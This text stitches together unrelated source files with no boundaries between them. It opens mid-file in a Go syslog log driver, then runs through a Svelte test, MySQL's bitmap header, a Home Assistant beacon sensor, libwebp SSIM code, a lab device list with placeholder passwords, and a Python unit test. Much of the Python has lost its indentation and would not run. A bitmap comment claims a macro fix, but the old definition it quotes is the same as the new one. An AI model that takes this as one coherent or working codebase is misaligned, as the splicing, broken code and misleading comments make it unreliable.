	"syslog":   syslog.LOG_SYSLOG,
	"lpr":      syslog.LOG_LPR,
	"news":     syslog.LOG_NEWS,
	"uucp":     syslog.LOG_UUCP,
	"cron":     syslog.LOG_CRON,
	"authpriv": syslog.LOG_AUTHPRIV,
	"ftp":      syslog.LOG_FTP,
	"local0":   syslog.LOG_LOCAL0,
	"local1":   syslog.LOG_LOCAL1,
	"local2":   syslog.LOG_LOCAL2,
	"local3":   syslog.LOG_LOCAL3,
	"local4":   syslog.LOG_LOCAL4,
	"local5":   syslog.LOG_LOCAL5,
	"local6":   syslog.LOG_LOCAL6,
	"local7":   syslog.LOG_LOCAL7,
}
// syslogger adapts an srslog writer to the logger.Logger interface.
type syslogger struct {
	writer *syslog.Writer
}
func init() {
	// Register the driver and its option validator with the logger registry;
	// failing to register is a programming error, hence panic.
	if err := logger.RegisterLogDriver(name, New); err != nil {
		panic(err)
	}
	if err := logger.RegisterLogOptValidator(name, ValidateLogOpt); err != nil {
		panic(err)
	}
}
// rsyslog uses appname part of syslog message to fill in an %syslogtag% template
// attribute in rsyslog.conf. In order to be backward compatible to rfc3164
// tag will be also used as an appname
func rfc5424formatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
	ts := time.Now().Format(time.RFC3339)
	return fmt.Sprintf("<%d>%d %s %s %s %d %s - %s",
		p, 1, ts, hostname, tag, os.Getpid(), tag, content)
}
// The timestamp field in rfc5424 is derived from rfc3339. Whereas rfc3339 makes allowances
// for multiple syntaxes, there are further restrictions in rfc5424, i.e., the maximum
// resolution is limited to "TIME-SECFRAC" which is 6 (microsecond resolution)
func rfc5424microformatterWithAppNameAsTag(p syslog.Priority, hostname, tag, content string) string {
	ts := time.Now().Format("2006-01-02T15:04:05.000000Z07:00")
	return fmt.Sprintf("<%d>%d %s %s %s %d %s - %s",
		p, 1, ts, hostname, tag, os.Getpid(), tag, content)
}
// New creates a syslog logger using the configuration passed in on
// the context. Supported context configuration variables are
// syslog-address, syslog-facility, syslog-format.
func New(info logger.Info) (logger.Logger, error) {
	tag, err := loggerutils.ParseLogTag(info, loggerutils.DefaultTemplate)
	if err != nil {
		return nil, err
	}
	proto, address, err := parseAddress(info.Config["syslog-address"])
	if err != nil {
		return nil, err
	}
	facility, err := parseFacility(info.Config["syslog-facility"])
	if err != nil {
		return nil, err
	}
	syslogFormatter, syslogFramer, err := parseLogFormat(info.Config["syslog-format"], proto)
	if err != nil {
		return nil, err
	}
	var log *syslog.Writer
	if proto == secureProto {
		// "tcp+tls" requires an explicit TLS configuration built from the
		// syslog-tls-* options.
		tlsConfig, tlsErr := parseTLSConfig(info.Config)
		if tlsErr != nil {
			return nil, tlsErr
		}
		log, err = syslog.DialWithTLSConfig(proto, address, facility, tag, tlsConfig)
	} else {
		log, err = syslog.Dial(proto, address, facility, tag)
	}
	if err != nil {
		return nil, err
	}
	log.SetFormatter(syslogFormatter)
	log.SetFramer(syslogFramer)
	return &syslogger{
		writer: log,
	}, nil
}
// Log sends one message to syslog: stderr lines at ERR severity, everything
// else at INFO severity. Empty lines are dropped.
func (s *syslogger) Log(msg *logger.Message) error {
	if len(msg.Line) == 0 {
		return nil
	}
	// Copy the needed fields before returning msg to the message pool.
	line := string(msg.Line)
	source := msg.Source
	logger.PutMessage(msg)
	if source == "stderr" {
		return s.writer.Err(line)
	}
	return s.writer.Info(line)
}
// Close closes the underlying syslog writer connection.
func (s *syslogger) Close() error {
	return s.writer.Close()
}
// Name returns the name of this log driver ("syslog").
func (s *syslogger) Name() string {
	return name
}
// parseAddress splits a syslog-address URL into (scheme, endpoint).
// Empty input yields empty results (srslog then uses its default target).
// unix/unixgram addresses return the socket path; tcp/udp/tcp+tls return
// host:port, appending the default syslog port when none was given.
func parseAddress(address string) (string, string, error) {
	if address == "" {
		return "", "", nil
	}
	addr, err := url.Parse(address)
	if err != nil {
		return "", "", err
	}
	// unix and unixgram socket validation
	if addr.Scheme == "unix" || addr.Scheme == "unixgram" {
		// the socket must already exist on the host
		if _, err := os.Stat(addr.Path); err != nil {
			return "", "", err
		}
		return addr.Scheme, addr.Path, nil
	}
	if addr.Scheme != "udp" && addr.Scheme != "tcp" && addr.Scheme != secureProto {
		return "", "", fmt.Errorf("unsupported scheme: '%s'", addr.Scheme)
	}
	// here we process tcp|udp
	host := addr.Host
	if _, _, err := net.SplitHostPort(host); err != nil {
		if !strings.Contains(err.Error(), "missing port in address") {
			return "", "", err
		}
		host = net.JoinHostPort(host, defaultPort)
	}
	return addr.Scheme, host, nil
}
// ValidateLogOpt looks for syslog specific log options
// syslog-address, syslog-facility.
func ValidateLogOpt(cfg map[string]string) error {
	// Set of option keys this driver accepts.
	validKeys := map[string]struct{}{
		"env":                    {},
		"env-regex":              {},
		"labels":                 {},
		"labels-regex":           {},
		"syslog-address":         {},
		"syslog-facility":        {},
		"syslog-tls-ca-cert":     {},
		"syslog-tls-cert":        {},
		"syslog-tls-key":         {},
		"syslog-tls-skip-verify": {},
		"tag":                    {},
		"syslog-format":          {},
	}
	for key := range cfg {
		if _, ok := validKeys[key]; !ok {
			return fmt.Errorf("unknown log opt '%s' for syslog log driver", key)
		}
	}
	// Validate the values of the structured options.
	if _, _, err := parseAddress(cfg["syslog-address"]); err != nil {
		return err
	}
	if _, err := parseFacility(cfg["syslog-facility"]); err != nil {
		return err
	}
	if _, _, err := parseLogFormat(cfg["syslog-format"], ""); err != nil {
		return err
	}
	return nil
}
// parseFacility resolves the "syslog-facility" option to an srslog priority.
// Accepts an empty string (defaults to LOG_DAEMON), a facility name from the
// facilities table, or a numeric facility in the range 0..23.
func parseFacility(facility string) (syslog.Priority, error) {
	if facility == "" {
		return syslog.LOG_DAEMON, nil
	}
	if prio, known := facilities[facility]; known {
		return prio, nil
	}
	if num, err := strconv.Atoi(facility); err == nil && num >= 0 && num <= 23 {
		// facility occupies the upper bits of the priority value
		return syslog.Priority(num << 3), nil
	}
	return syslog.Priority(0), errors.New("invalid syslog facility")
}
// parseTLSConfig builds a client TLS configuration from the syslog-tls-*
// log options. Note the mere presence of "syslog-tls-skip-verify" (with any
// value, even empty) disables certificate verification.
func parseTLSConfig(cfg map[string]string) (*tls.Config, error) {
	_, skipVerify := cfg["syslog-tls-skip-verify"]
	opts := tlsconfig.Options{
		CAFile:             cfg["syslog-tls-ca-cert"],
		CertFile:           cfg["syslog-tls-cert"],
		KeyFile:            cfg["syslog-tls-key"],
		InsecureSkipVerify: skipVerify,
	}
	return tlsconfig.Client(opts)
}
// parseLogFormat maps the "syslog-format" option to an srslog formatter and
// framer pair. For RFC 5424 variants over tcp+tls, RFC 5425 octet-counting
// framing is used; all other combinations use the default framer.
func parseLogFormat(logFormat, proto string) (syslog.Formatter, syslog.Framer, error) {
	switch logFormat {
	case "":
		// no format configured: srslog's legacy unix format
		return syslog.UnixFormatter, syslog.DefaultFramer, nil
	case "rfc3164":
		return syslog.RFC3164Formatter, syslog.DefaultFramer, nil
	case "rfc5424":
		if proto == secureProto {
			return rfc5424formatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil
		}
		return rfc5424formatterWithAppNameAsTag, syslog.DefaultFramer, nil
	case "rfc5424micro":
		if proto == secureProto {
			return rfc5424microformatterWithAppNameAsTag, syslog.RFC5425MessageLengthFramer, nil
		}
		return rfc5424microformatterWithAppNameAsTag, syslog.DefaultFramer, nil
	default:
		return nil, nil, errors.New("Invalid syslog format")
	}
}
import { test } from '../../test';

export default test({
	// Static <select> with rich option markup: hydration must keep the
	// server-rendered content intact.
	snapshot(target) {
		const [option1, option2, option3] = target.querySelectorAll('option');
		return {
			select: target.querySelector('select'),
			option1,
			option2,
			option3
		};
	},
	async test(assert, target) {
		const [bold, italic, plain] = target.querySelectorAll('option');
		// The text of every option must survive hydration unchanged.
		assert.equal(bold?.textContent, 'Bold Option');
		assert.equal(italic?.textContent, 'Italic Option');
		assert.equal(plain?.textContent, 'Plain Option');
		// Rich child elements may or may not be preserved depending on
		// browser support, so only assert on them when present.
		const strong = bold?.querySelector('strong');
		if (strong) {
			assert.equal(strong.textContent, 'Bold');
		}
		const em = italic?.querySelector('em');
		if (em) {
			assert.equal(em.textContent, 'Italic');
		}
	}
});
/*
Copyright (c) 2001, 2025, Oracle and/or its affiliates.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License, version 2.0,
as published by the Free Software Foundation.
This program is designed to work with certain software (including
but not limited to OpenSSL) that is licensed under separate terms,
as designated in a particular file or component or in included license
documentation. The authors of MySQL hereby grant you an additional
permission to link the program and your derivative works with the
separately licensed software that they have either included with
the program or referenced in the documentation.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License, version 2.0, for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA */
#ifndef MY_BITMAP_INCLUDED
#define MY_BITMAP_INCLUDED
/**
@file include/my_bitmap.h
*/
#define MY_BIT_NONE (~(uint)0)
#include <assert.h>
#include <limits.h>
#include <string.h>
#include <sys/types.h>
#include "my_inttypes.h"
typedef uint32 my_bitmap_map;
struct MY_BITMAP {
  my_bitmap_map *bitmap{nullptr}; /* storage: array of 32-bit words */
  uint n_bits{0}; /* number of bits occupied by the above */
  /* mask of the unused tail bits of the last word (cf. bitmap_cmp) */
  my_bitmap_map last_word_mask{0};
  my_bitmap_map *last_word_ptr{nullptr}; /* points at the last word */
};
extern void create_last_word_mask(MY_BITMAP *map);
extern bool bitmap_init(MY_BITMAP *map, my_bitmap_map *buf, uint n_bits);
extern bool bitmap_is_clear_all(const MY_BITMAP *map);
extern bool bitmap_is_prefix(const MY_BITMAP *map, uint prefix_size);
extern bool bitmap_is_set_all(const MY_BITMAP *map);
extern bool bitmap_is_subset(const MY_BITMAP *map1, const MY_BITMAP *map2);
extern bool bitmap_is_overlapping(const MY_BITMAP *map1, const MY_BITMAP *map2);
extern bool bitmap_is_valid(const MY_BITMAP *map);
extern bool bitmap_test_and_set(MY_BITMAP *map, uint bitmap_bit);
extern uint bitmap_set_next(MY_BITMAP *map);
extern uint bitmap_get_first(const MY_BITMAP *map);
extern uint bitmap_get_first_set(const MY_BITMAP *map);
extern uint bitmap_get_next_set(const MY_BITMAP *map, uint bitmap_bit);
extern uint bitmap_bits_set(const MY_BITMAP *map);
extern void bitmap_free(MY_BITMAP *map);
extern void bitmap_set_above(MY_BITMAP *map, uint from_byte, bool use_bit);
extern void bitmap_set_prefix(MY_BITMAP *map, uint prefix_size);
extern void bitmap_intersect(MY_BITMAP *to, const MY_BITMAP *from);
extern void bitmap_subtract(MY_BITMAP *map, const MY_BITMAP *map2);
extern void bitmap_union(MY_BITMAP *map, const MY_BITMAP *map2);
extern void bitmap_xor(MY_BITMAP *map, const MY_BITMAP *map2);
extern void bitmap_invert(MY_BITMAP *map);
extern void bitmap_copy(MY_BITMAP *map, const MY_BITMAP *map2);
extern uint bitmap_n_copy(MY_BITMAP *dst, const MY_BITMAP *src,
uint max_bits_to_copy = UINT_MAX);
/* Bytes needed to hold 'bits' bits, rounded up to whole 32-bit words.
   The expansion is now fully parenthesized: the previous definition
   (((bits) + 31) / 32) * 4 mis-composed inside larger expressions,
   e.g. as the right operand of a division. */
#define bitmap_buffer_size(bits) ((((bits) + 31) / 32) * 4)
/* Bytes / 32-bit words actually spanned by map->n_bits. */
#define no_bytes_in_map(map) (((map)->n_bits + 7) / 8)
#define no_words_in_map(map) (((map)->n_bits + 31) / 32)
/* Set bit 'bit' (byte-addressed, so the layout is endian-independent). */
static inline void bitmap_set_bit(MY_BITMAP *map, uint bit) {
  assert(bit < map->n_bits);
  uchar *bytes = (uchar *)map->bitmap;
  bytes[bit >> 3] |= (uchar)(1U << (bit & 7));
}
/* Toggle bit 'bit' in place. */
static inline void bitmap_flip_bit(MY_BITMAP *map, uint bit) {
  assert(bit < map->n_bits);
  uchar *bytes = (uchar *)map->bitmap;
  bytes[bit >> 3] ^= (uchar)(1U << (bit & 7));
}
/* Clear bit 'bit'. */
static inline void bitmap_clear_bit(MY_BITMAP *map, uint bit) {
  assert(bit < map->n_bits);
  uchar *bytes = (uchar *)map->bitmap;
  bytes[bit >> 3] &= (uchar)~(1U << (bit & 7));
}
static inline bool bitmap_is_set(const MY_BITMAP *map, uint bit) {
assert(bit < map->n_bits);
return ((uchar *)map->bitmap)[bit / 8] & (1 << (bit & 7));
}
/**
Quite unlike other C comparison functions ending with 'cmp', e.g. memcmp(),
strcmp(), this function returns true if the bitmaps are equal, and false
otherwise.
@retval true The bitmaps are equal.
@retval false The bitmaps differ.
*/
static inline bool bitmap_cmp(const MY_BITMAP *map1, const MY_BITMAP *map2) {
assert(map1->n_bits > 0);
assert(map2->n_bits > 0);
// NOTE(review): only map1's word count is used below, so this assumes
// both maps have the same n_bits — not checked here; confirm callers.
// All complete words can be compared verbatim with memcmp ...
if (memcmp(map1->bitmap, map2->bitmap, 4 * (no_words_in_map(map1) - 1)) != 0)
return false;
// ... but the final word carries undefined padding bits, so OR in
// last_word_mask to force the unused tail bits to compare equal.
return ((*map1->last_word_ptr | map1->last_word_mask) ==
(*map2->last_word_ptr | map2->last_word_mask));
}
/*
Clears all bits. This is allowed even for a zero-size bitmap.
*/
/* Clear every bit (padding bits of the last word included).
   Safe even for a zero-size bitmap: the byte count is then zero. */
static inline void bitmap_clear_all(MY_BITMAP *map) {
  const size_t n_bytes = no_words_in_map(map) * 4;
  memset(map->bitmap, 0, n_bytes);
}
/*
Sets all bits. This is allowed even for a zero-size bitmap.
*/
/* Set every bit (padding bits of the last word included).
   Safe even for a zero-size bitmap: the byte count is then zero. */
static inline void bitmap_set_all(MY_BITMAP *map) {
  const size_t n_bytes = no_words_in_map(map) * 4;
  memset(map->bitmap, 0xFF, n_bytes);
}
#endif // MY_BITMAP_INCLUDED | c | github | https://github.com/mysql/mysql-server | include/my_bitmap.h |
"""
Read temperature information from Eddystone beacons.
Your beacons must be configured to transmit UID (for identification) and TLM
(for temperature) frames.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.eddystone_temperature/
"""
import logging
import voluptuous as vol
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME, TEMP_CELSIUS, STATE_UNKNOWN, EVENT_HOMEASSISTANT_STOP,
EVENT_HOMEASSISTANT_START)
# Third-party scanner library installed on demand by Home Assistant.
REQUIREMENTS = ['beacontools[scan]==1.0.1']
_LOGGER = logging.getLogger(__name__)
# Configuration keys for this platform.
CONF_BEACONS = 'beacons'
CONF_BT_DEVICE_ID = 'bt_device_id'
CONF_INSTANCE = 'instance'
CONF_NAMESPACE = 'namespace'
# One beacon entry: Eddystone UID namespace + instance, optional name.
BEACON_SCHEMA = vol.Schema({
vol.Required(CONF_NAMESPACE): cv.string,
vol.Required(CONF_INSTANCE): cv.string,
vol.Optional(CONF_NAME): cv.string
})
# Platform config: optional Bluetooth adapter index plus a mapping of
# device name -> beacon entry.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Optional(CONF_BT_DEVICE_ID, default=0): cv.positive_int,
vol.Required(CONF_BEACONS): vol.Schema({cv.string: BEACON_SCHEMA}),
})
# pylint: disable=unused-argument
def setup_platform(hass, config, add_devices, discovery_info=None):
    """Validate configuration, create devices and start monitoring thread.

    Uses the CONF_* constants declared above (the previous version
    duplicated them as raw string literals, which would silently break
    if a constant were ever renamed).
    """
    bt_device_id = config.get(CONF_BT_DEVICE_ID)
    beacons = config.get(CONF_BEACONS)
    devices = []

    for dev_name, properties in beacons.items():
        # Namespace is 20 hex chars (10 bytes), instance 12 (6 bytes).
        namespace = get_from_conf(properties, CONF_NAMESPACE, 20)
        instance = get_from_conf(properties, CONF_INSTANCE, 12)
        name = properties.get(CONF_NAME, dev_name)

        if instance is None or namespace is None:
            _LOGGER.error("Skipping %s", dev_name)
            continue
        devices.append(EddystoneTemp(name, namespace, instance))

    if devices:
        mon = Monitor(hass, devices, bt_device_id)

        def monitor_stop(_service_or_event):
            """Stop the monitor thread."""
            _LOGGER.info("Stopping scanner for Eddystone beacons")
            mon.stop()

        def monitor_start(_service_or_event):
            """Start the monitor thread."""
            _LOGGER.info("Starting scanner for Eddystone beacons")
            mon.start()

        add_devices(devices)
        mon.start()
        hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, monitor_stop)
        hass.bus.listen_once(EVENT_HOMEASSISTANT_START, monitor_start)
    else:
        _LOGGER.warning("No devices were added")
def get_from_conf(config, config_key, length):
    """Retrieve a value from *config* and validate its character length.

    Returns the string when it is exactly *length* characters long,
    otherwise logs an error and returns None. A missing key is now
    treated like an invalid value instead of raising TypeError from
    len(None).
    """
    string = config.get(config_key)
    if string is None or len(string) != length:
        # length is in hex characters; two characters encode one byte.
        _LOGGER.error("Error in config parameter %s: Must be exactly %d "
                      "bytes. Device will not be added", config_key, length / 2)
        return None
    return string
class EddystoneTemp(Entity):
"""Representation of a temperature sensor."""
def __init__(self, name, namespace, instance):
"""Initialize a sensor."""
self._name = name
# Eddystone UID namespace/instance; Monitor.process_packet matches
# incoming TLM frames against these two fields.
self.namespace = namespace
self.instance = instance
# NOTE(review): bt_addr is never read or written elsewhere in this
# module — possibly dead; verify before removing.
self.bt_addr = None
# Last temperature received; updated by Monitor.process_packet.
self.temperature = STATE_UNKNOWN
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self.temperature
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return TEMP_CELSIUS
@property
def should_poll(self):
"""Return the polling state."""
# Push-based: Monitor calls schedule_update_ha_state on change.
return False
class Monitor(object):
"""Continuously scan for BLE advertisements."""
def __init__(self, hass, devices, bt_device_id):
"""Construct interface object."""
self.hass = hass
# List of beacons to monitor
self.devices = devices
# Number of the bt device (hciX)
self.bt_device_id = bt_device_id
# Closure handed to BeaconScanner; forwards each TLM frame to
# process_packet keyed by the sender's namespace/instance.
def callback(bt_addr, _, packet, additional_info):
"""Handle new packets."""
self.process_packet(
additional_info['namespace'], additional_info['instance'],
packet.temperature)
# Imported here (not at module top) so the hard dependency is only
# required once the platform is actually set up.
# pylint: disable=import-error
from beacontools import (
BeaconScanner, EddystoneFilter, EddystoneTLMFrame)
device_filters = [EddystoneFilter(d.namespace, d.instance)
for d in devices]
self.scanner = BeaconScanner(
callback, bt_device_id, device_filters, EddystoneTLMFrame)
self.scanning = False
def start(self):
"""Start the scanner unless it is already running."""
if not self.scanning:
self.scanner.start()
self.scanning = True
else:
_LOGGER.debug(
"start() called, but scanner is already running")
def process_packet(self, namespace, instance, temperature):
"""Assign temperature to device."""
# NOTE(review): "%d" truncates the log output if temperature is a
# float — confirm the type beacontools delivers.
_LOGGER.debug("Received temperature for <%s,%s>: %d",
namespace, instance, temperature)
for dev in self.devices:
if dev.namespace == namespace and dev.instance == instance:
# Only push a state update when the value actually changed.
if dev.temperature != temperature:
dev.temperature = temperature
dev.schedule_update_ha_state()
def stop(self):
"""Signal runner to stop and join thread."""
if self.scanning:
_LOGGER.debug("Stopping...")
self.scanner.stop()
_LOGGER.debug("Stopped")
self.scanning = False
else:
_LOGGER.debug(
"stop() called but scanner was not running")
// Copyright 2017 Google Inc. All Rights Reserved.
//
// Use of this source code is governed by a BSD-style license
// that can be found in the COPYING file in the root of the source
// tree. An additional intellectual property rights grant can be found
// in the file PATENTS. All contributing project authors may
// be found in the AUTHORS file in the root of the source tree.
// -----------------------------------------------------------------------------
//
// distortion calculation
//
// Author: Skal (pascal.massimino@gmail.com)
#include <assert.h>
#include <stdlib.h> // for abs()
#include "src/dsp/cpu.h"
#include "src/dsp/dsp.h"
#include "src/webp/types.h"
#if !defined(WEBP_REDUCE_SIZE)
//------------------------------------------------------------------------------
// SSIM / PSNR
// hat-shaped filter. Sum of coefficients is equal to 16.
// 7 taps => the SSIM kernel radius VP8_SSIM_KERNEL is 3; the 2-D weight
// of a sample is kWeight[dx] * kWeight[dy].
static const uint32_t kWeight[2 * VP8_SSIM_KERNEL + 1] = {
1, 2, 3, 4, 3, 2, 1
};
// Total 2-D weight over the full kernel: (sum kWeight)^2 = 16 * 16.
static const uint32_t kWeightSum = 16 * 16; // sum{kWeight}^2
// Integer-arithmetic SSIM from accumulated weighted moments. N is the
// total sample weight (kWeightSum for a full kernel, stats->w when the
// window was clipped); the stabilizing constants C1/C2/C3 scale with N^2.
static WEBP_INLINE double SSIMCalculation(
const VP8DistoStats* const stats, uint32_t N /*num samples*/) {
const uint32_t w2 = N * N;
const uint32_t C1 = 20 * w2;
const uint32_t C2 = 60 * w2;
const uint32_t C3 = 8 * 8 * w2; // 'dark' limit ~= 6
const uint64_t xmxm = (uint64_t)stats->xm * stats->xm;
const uint64_t ymym = (uint64_t)stats->ym * stats->ym;
if (xmxm + ymym >= C3) {
const int64_t xmym = (int64_t)stats->xm * stats->ym;
const int64_t sxy = (int64_t)stats->xym * N - xmym; // can be negative
const uint64_t sxx = (uint64_t)stats->xxm * N - xmxm;
const uint64_t syy = (uint64_t)stats->yym * N - ymym;
// we descale by 8 to prevent overflow during the fnum/fden multiply.
// Negative covariance is clamped to 0 before entering the numerator.
const uint64_t num_S = (2 * (uint64_t)(sxy < 0 ? 0 : sxy) + C2) >> 8;
const uint64_t den_S = (sxx + syy + C2) >> 8;
const uint64_t fnum = (2 * xmym + C1) * num_S;
const uint64_t fden = (xmxm + ymym + C1) * den_S;
const double r = (double)fnum / fden;
assert(r >= 0. && r <= 1.0);
return r;
}
return 1.; // area is too dark to contribute meaningfully
}
// SSIM for stats gathered over a full (unclipped) kernel: the sample
// weight is the fixed kWeightSum.
double VP8SSIMFromStats(const VP8DistoStats* const stats) {
return SSIMCalculation(stats, kWeightSum);
}
// SSIM for stats gathered over a window clipped at the image border:
// the actual accumulated weight stats->w is used instead of kWeightSum.
double VP8SSIMFromStatsClipped(const VP8DistoStats* const stats) {
return SSIMCalculation(stats, stats->w);
}
// SSIM of the kernel window centered at (xo, yo), with the window
// clamped to the W x H image bounds; accumulates the running weight in
// stats.w so the border-aware VP8SSIMFromStatsClipped can normalize.
static double SSIMGetClipped_C(const uint8_t* src1, int stride1,
const uint8_t* src2, int stride2,
int xo, int yo, int W, int H) {
VP8DistoStats stats = { 0, 0, 0, 0, 0, 0 };
const int ymin = (yo - VP8_SSIM_KERNEL < 0) ? 0 : yo - VP8_SSIM_KERNEL;
const int ymax = (yo + VP8_SSIM_KERNEL > H - 1) ? H - 1
: yo + VP8_SSIM_KERNEL;
const int xmin = (xo - VP8_SSIM_KERNEL < 0) ? 0 : xo - VP8_SSIM_KERNEL;
const int xmax = (xo + VP8_SSIM_KERNEL > W - 1) ? W - 1
: xo + VP8_SSIM_KERNEL;
int x, y;
src1 += ymin * stride1;
src2 += ymin * stride2;
for (y = ymin; y <= ymax; ++y, src1 += stride1, src2 += stride2) {
for (x = xmin; x <= xmax; ++x) {
// kWeight is indexed by offset from the window center.
const uint32_t w = kWeight[VP8_SSIM_KERNEL + x - xo]
* kWeight[VP8_SSIM_KERNEL + y - yo];
const uint32_t s1 = src1[x];
const uint32_t s2 = src2[x];
stats.w += w;
stats.xm += w * s1;
stats.ym += w * s2;
stats.xxm += w * s1 * s1;
stats.xym += w * s1 * s2;
stats.yym += w * s2 * s2;
}
}
return VP8SSIMFromStatsClipped(&stats);
}
// SSIM of a full, unclipped kernel window whose top-left corner is at
// src1/src2. stats.w is deliberately left at 0: VP8SSIMFromStats uses
// the fixed kWeightSum instead of the accumulated weight.
static double SSIMGet_C(const uint8_t* src1, int stride1,
const uint8_t* src2, int stride2) {
VP8DistoStats stats = { 0, 0, 0, 0, 0, 0 };
int x, y;
for (y = 0; y <= 2 * VP8_SSIM_KERNEL; ++y, src1 += stride1, src2 += stride2) {
for (x = 0; x <= 2 * VP8_SSIM_KERNEL; ++x) {
const uint32_t w = kWeight[x] * kWeight[y];
const uint32_t s1 = src1[x];
const uint32_t s2 = src2[x];
stats.xm += w * s1;
stats.ym += w * s2;
stats.xxm += w * s1 * s1;
stats.xym += w * s1 * s2;
stats.yym += w * s2 * s2;
}
}
return VP8SSIMFromStats(&stats);
}
#endif // !defined(WEBP_REDUCE_SIZE)
//------------------------------------------------------------------------------
#if !defined(WEBP_DISABLE_STATS)
// Sum of squared differences between two byte buffers of length 'len'.
static uint32_t AccumulateSSE_C(const uint8_t* src1,
                                const uint8_t* src2, int len) {
  uint32_t acc = 0;
  int i = 0;
  // max diff^2 is 255^2 = 65025; 65535 such terms still fit in uint32_t.
  assert(len <= 65535);
  while (i < len) {
    const int32_t d = src1[i] - src2[i];
    acc += (uint32_t)(d * d);
    ++i;
  }
  return acc;
}
#endif
//------------------------------------------------------------------------------
// Dispatch pointers: set to the C fallbacks below, then optionally
// rebound to SIMD implementations by the init function.
#if !defined(WEBP_REDUCE_SIZE)
VP8SSIMGetFunc VP8SSIMGet;
VP8SSIMGetClippedFunc VP8SSIMGetClipped;
#endif
#if !defined(WEBP_DISABLE_STATS)
VP8AccumulateSSEFunc VP8AccumulateSSE;
#endif
extern VP8CPUInfo VP8GetCPUInfo;
extern void VP8SSIMDspInitSSE2(void);
// One-time init (WEBP_DSP_INIT_FUNC guarantees single execution):
// install the portable C implementations, then upgrade to SSE2 when the
// CPU supports it and the build enables it.
WEBP_DSP_INIT_FUNC(VP8SSIMDspInit) {
#if !defined(WEBP_REDUCE_SIZE)
VP8SSIMGetClipped = SSIMGetClipped_C;
VP8SSIMGet = SSIMGet_C;
#endif
#if !defined(WEBP_DISABLE_STATS)
VP8AccumulateSSE = AccumulateSSE_C;
#endif
if (VP8GetCPUInfo != NULL) {
#if defined(WEBP_HAVE_SSE2)
if (VP8GetCPUInfo(kSSE2)) {
VP8SSIMDspInitSSE2();
}
#endif
}
}
# Inventory of lab devices, each expressed as a Netmiko-style
# connection dictionary.

cisco_881 = dict(
    device_type='cisco_ios',
    ip='10.10.10.227',
    username='test1',
    password='password',
    secret='secret',
    verbose=False,
)

cisco_asa = dict(
    device_type='cisco_asa',
    ip='10.10.10.226',
    username='admin',
    password='password',
    secret='secret',
    verbose=False,
)

# Four Arista vEOS switches on the same host, distinguished by SSH port.
arista_veos_sw1 = dict(
    device_type='arista_eos',
    ip='10.10.10.227',
    username='admin1',
    password='password',
    secret='',
    port=8222,
    verbose=False,
)

arista_veos_sw2 = dict(
    device_type='arista_eos',
    ip='10.10.10.227',
    username='admin1',
    password='password',
    secret='',
    port=8322,
    verbose=False,
)

arista_veos_sw3 = dict(
    device_type='arista_eos',
    ip='10.10.10.227',
    username='admin1',
    password='password',
    secret='',
    port=8422,
    verbose=False,
)

arista_veos_sw4 = dict(
    device_type='arista_eos',
    ip='10.10.10.227',
    username='admin1',
    password='password',
    secret='',
    port=8522,
    verbose=False,
)

hp_procurve = dict(
    device_type='hp_procurve',
    ip='10.10.10.227',
    username='admin',
    password='password',
    secret='',
    port=9922,
    verbose=False,
)

hp_comware = dict(
    device_type='hp_comware',
    ip='192.168.112.11',
    username='admin',
    password='admin',
    port=22,
    verbose=False,
)

brocade_vdx = dict(
    device_type='brocade_vdx',
    ip='10.254.8.8',
    username='admin',
    password='password',
    port=22,
    verbose=False,
)

# All devices, in declaration order.
all_devices = [
    cisco_881,
    cisco_asa,
    arista_veos_sw1,
    arista_veos_sw2,
    arista_veos_sw3,
    arista_veos_sw4,
    hp_procurve,
    hp_comware,
    brocade_vdx,
]
# Copyright 2013 Google Inc. All Rights Reserved.
"""Tests for utils.py."""
import unittest
from protorpc import messages
from . import utils
class UtilsTests(unittest.TestCase):
"""Comprehensive test for the endpoints_proto_datastore.utils module."""
def testIsSubclass(self):
"""Tests the utils.IsSubclass method."""
self.assertTrue(utils.IsSubclass(int, int))
self.assertTrue(utils.IsSubclass(bool, int))
# NOTE(review): basestring exists only on Python 2; this module is
# not Python 3 compatible as written.
self.assertTrue(utils.IsSubclass(str, (str, basestring)))
self.assertFalse(utils.IsSubclass(int, bool))
# Make sure this does not fail
self.assertFalse(utils.IsSubclass(int, None))
def testDictToTuple(self):
"""Tests the utils._DictToTuple method."""
# pylint:disable-msg=W0212
self.assertRaises(AttributeError, utils._DictToTuple, None)
# Object whose 'items' attribute is present but not callable, to
# exercise the TypeError path.
class Simple(object):
items = None # Not callable
self.assertRaises(TypeError, utils._DictToTuple, Simple)
single_value_dictionary = {1: 2}
self.assertEqual((1,), utils._DictToTuple(single_value_dictionary))
# Keys are expected back ordered by their associated values.
multiple_value_dictionary = {-5: 3, 1: 1, 3: 2}
self.assertEqual((1, 3, -5), utils._DictToTuple(multiple_value_dictionary))
# pylint:enable-msg=W0212
def testGeoPtMessage(self):
"""Tests the utils.GeoPtMessage protorpc message class."""
geo_pt_message = utils.GeoPtMessage(lat=1.0)
self.assertEqual(geo_pt_message.lat, 1.0)
self.assertEqual(geo_pt_message.lon, None)
# Message is incomplete until both lat and lon are set.
self.assertFalse(geo_pt_message.is_initialized())
geo_pt_message.lon = 2.0
self.assertEqual(geo_pt_message.lon, 2.0)
self.assertTrue(geo_pt_message.is_initialized())
self.assertRaises(messages.ValidationError,
utils.GeoPtMessage, lat='1', lon=2)
# Positional construction and unknown fields are both rejected.
self.assertRaises(TypeError, utils.GeoPtMessage, 1.0, 2.0)
self.assertRaises(AttributeError, utils.GeoPtMessage,
lat=1.0, lon=2.0, other=3.0)
geo_pt_message = utils.GeoPtMessage(lat=1.0, lon=2.0)
self.assertTrue(geo_pt_message.is_initialized())
# Run the suite when this module is executed directly.
if __name__ == '__main__':
unittest.main()
